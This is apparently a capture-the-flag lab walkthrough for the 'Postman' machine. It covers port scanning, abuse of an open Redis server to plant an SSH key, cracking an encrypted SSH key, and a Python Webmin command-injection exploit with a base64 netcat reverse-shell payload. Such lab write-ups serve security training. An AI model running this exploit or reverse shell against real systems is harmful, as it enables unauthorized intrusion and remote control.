Postman

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.160 -oN allPorts

• -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

• --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

• -p- scanning the entire port range, from 1 to 65535.

• -T5 insane mode, it is the fastest mode of the nmap time template.

• -Pn assume the host is online.

• -n scan without reverse DNS resolution.

• -oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Wed Jan  5 15:30:55 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.160
Warning: 10.10.10.160 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.160
Host is up (0.068s latency).
Not shown: 64699 closed tcp ports (reset), 832 filtered tcp ports (no-response)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
6379/tcp  open  redis
10000/tcp open  snet-sensor-mgmt

# Nmap done at Wed Jan  5 15:31:15 2022 -- 1 IP address (1 host up) scanned in 20.29 seconds

As we see, a few ports are open.

Let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p22,80,6379,10000 10.10.10.160 -oN targeted

• -sC performs the scan using the default set of scripts.

• -sV enables version detection.

• -oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Wed Jan  5 15:32:05 2022 as: nmap -p22,80,6379,10000 -sCV -oN targeted 10.10.10.160
Nmap scan report for 10.10.10.160
Host is up (0.038s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Cyber Geek's Personal Website
|_http-server-header: Apache/2.4.29 (Ubuntu)
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan  5 15:32:43 2022 -- 1 IP address (1 host up) scanned in 37.85 seconds

We have an SSH server, a website, a Redis server, and a Webmin httpd server. I anticipate that you will not find anything interesting on the website. And if you search for any Webmin 1.910 exploit on exploit-db, you'll see there is one exploit, but we have to be authenticated, so let's save that for later.

Exploitation

So let's investigate on the Redis server. By doing your own research, you'll find an article explaining that we could have RCE (Remote Code Execution) via SSH. The idea is to create a pair of SSH keys locally, and add the public key to the authorized_keys file on the victim's machine, so we can later log in with our private key.

First, let's create the SSH keys with no passphrase.

ssh-keygen -t rsa

Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:qUhqKb24Xashwf6FZut9CBemPGaBKuKXuffwVVhYS98 root@alfa8sa-virtualbox
The key's randomart image is:
+---[RSA 3072]----+
|           o     |
|          + o .  |
|  .      . o . E |
|.. . o   .o      |
|o.. = . S. .     |
|=o @.o .  .      |
|*.O+Ooo  .       |
| B+B++o..        |
|o.**+.oo         |
+----[SHA256]-----+

Then we'll have to add some space at the beginning and at the end of the public key, and save it into a file.

(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > spaced_key.txt

Then we'll have to import the file into the redis server.

cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key

Finally, let's connect to the Redis server, go to the .ssh directory, create the authorized_keys file and save it.

redis-cli -h 10.10.10.160

10.10.10.160:6379> config set dir /var/lib/redis/.ssh

10.10.10.160:6379> config set dbfilename "authorized_keys"

10.10.10.160:6379> save

Then, all we have to do is connect via SSH with the user redis and our private key.

ssh -i id_rsa redis@10.10.10.160

Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$ whoami
redis

Privilege Escalation

At this point, I started enumerating the machine, and I found a backup file of an SSH private key owned by the Matt user.

ls -l /opt/

total 4
-rwxr-xr-x 1 Matt Matt 1743 Aug 26  2019 id_rsa.bak

Let's copy it and paste it on our local machine, and give it the right permissions.

nano id_rsa.bak

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
-----END RSA PRIVATE KEY-----

chmod 600 id_rsa.bak

Now let's log in with it via SSH.

ssh -i id_rsa.bak Matt@10.10.10.160

Enter passphrase for key 'id_rsa.bak':

It asks for a passphrase, but we don't have one. One thing we could do is break the private key with john. First, let's convert the private key into a format that john understands with ssh2john.

python3 /usr/share/john/ssh2john.py id_rsa.bak > hash

Then break it with john.

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (id_rsa.bak)
1g 0:00:00:24 DONE (2022-02-08 15:38) 0.04086g/s 586093p/s 586093c/s 586093C/sa6_123..*7¡Vamos!
Session completed

Now that we've got the passphrase, let's log in again via SSH.

ssh -i id_rsa.bak Matt@10.10.10.160

Enter passphrase for key 'id_rsa.bak': computer2008
Connection closed by 10.10.10.160 port 22

We got rejected, but no worries, let's go to the previous shell we had, and log in with the user Matt.

su Matt

Password: computer2008
Matt@Postman:/var/lib/redis$ whoami
Matt
Matt@Postman:/var/lib/redis$ cat /home/Matt/user.txt 
51ddda4a2897104427291e1df7aac984

At this point I couldn't find any way to become the root user, but I remembered the Webmin exploit I found earlier, which needed valid credentials.

As the exploit is meant to be used with Metasploit, and I don't like using Metasploit, I coded my own script. What the script basically does, is log in to Webmin as the user Matt, send a POST request to a specific URL with a payload which sends back a reverse shell, and finally I used the pwn library to catch the reverse shell.

If you use this script, make sure you change the base64 encoded payload with one containing your IP address.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc you_ip 5555 >/tmp/f" | base64

#!/usr/bin/env python3

from pwn import *
import requests
import pdb
import urllib3

def def_handler(sig, frame):
    print("\n[!] Saliendo...\n")
    sys.exit(1)

#Ctrl+C
signal.signal(signal.SIGINT, def_handler)

# Variables globales
login_url = "https://10.10.10.160:10000/session_login.cgi"
package_updates_url = "https://10.10.10.160:10000/package-updates/update.cgi"
burp = {'https': 'http://127.0.0.1:8080'} # Proxie
lport = 5555

def makeRequest():
    urllib3.disable_warnings() #SSL
    s = requests.session()
    s.verify = False

    post_data = {
        'page': "",
        "user": "Matt",
        "pass": "computer2008"
    }
    headers = {
        'cookie': "testing=1"
    }

    r = s.post(login_url, post_data, headers=headers)

    post_data = [
        ('u', 'acl/apt'),
        ('u', ' | bash -c "echo cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAuMTAuMTQuMTkgNTU1NSA+L3RtcC9mCg== | base64 -d | sh"'),
        ('ok_top', 'Update+Selected+Packages')
    ]
    headers = {
        "Referer": "https://10.10.10.160:10000"
    }
    r = s.post(package_updates_url, post_data, headers=headers)
    output = html.unescape(re.findall(r'<pre>(.*?)</pre>', r.text, re.DOTALL)[0]).strip()

if __name__ == '__main__':

    try:
        threading.Thread(target=makeRequest, args=()).start()
    except Exception as e:
        log.error(str(e))

    shell = listen(lport, timeout=20).wait_for_connection()

    shell.interactive()

If we run the script, then we could finally reap the harvest and take the root flag.

python3 exploit.py

[+] Trying to bind to :: on port 5555: Done
[+] Waiting for connections on :::5555: Got connection from ::ffff:10.10.10.160 on port 54600
[*] Switching to interactive mode
/bin/sh: 0: can't access tty; job control turned off
# $ whoami
root
# $ cat /root/root.txt
c55da24af37f7d18824bbb5d9ccc70da